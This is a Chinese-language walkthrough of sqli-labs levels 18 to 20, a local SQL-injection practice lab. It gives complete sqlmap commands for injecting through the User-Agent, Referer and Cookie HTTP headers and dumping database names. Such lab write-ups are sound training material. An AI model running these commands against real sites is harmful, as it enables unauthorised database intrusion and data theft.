sql-labs 18-20(sqlmap注入)
这三题主要是关于HTTP头部的注入
常见的HTTP注入点产生位置为
【Referer】、【X-Forwarded-For】、【Cookie】、【X-Real-IP】、【Accept-Language】、【Authorization】
Less18:报错型,单引号,user-agent型注入点
由于这一题时关于user-agent的注入
两种sqlmap注入方式
python sqlmap.py -r 1.txt --dbs --threads 8 --technique BTES python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-18/" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST
第一种方式是将HTTP请求包的内容放在一个txt文件里面,cookie可以不用放,然后-r跟上txt文件的路径,让sqlmap自动跑,这里要注意user-agent值后面要跟上”*“符号
第二种方式就在语句中直接跟上存在注入点的http请求头参数的值,同样,注入点处还是得跟上”*”符号
-r: sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等) --user-agent http头会携带一个值,就是user-agent,表示访问的浏览器的信息 sqlmap 检查uesr-agent中的注入点, lever>=3才会去检查user-agent头是否存在注入漏洞
Less19:单引号,referer型注入点
跟十八关差不多,只是存在注入点的HTTP请求头参数不一样,这里是referer处存在注入点
同样用两种方式:
注意注入点处要跟上“*”符号
python sqlmap.py -r 1.txt --dbs --threads 8 --technique BEST python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-19/" --referer=" http://127.0.0.1/sqli-labs-master/Less-19/*" --level 4 --dbs --threads 8 --technique BEST
Less20:单引号,cookie型注入
http头部cookie处存在注入点,用cookie注入的sqlmap语句
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-20/" --cookie="48zL_2132_ulastactivity=fbcd4XN6yzDIyGYPfy3uCZanmWgjMX0XMh%2Bk8uqR1UGkGf9RpEIe; 48zL_2132_lastcheckfeed=3%7C1556519884; __guid=96992031.3043186743165115400.1567255498313.9548; monitor_count=49" --level 3 --dbs
--cookie web应用基于cookie的身份验证,对于post请求,可以指定cookie sqlmap -u "url" --cookie="..." --level 3 –-dbs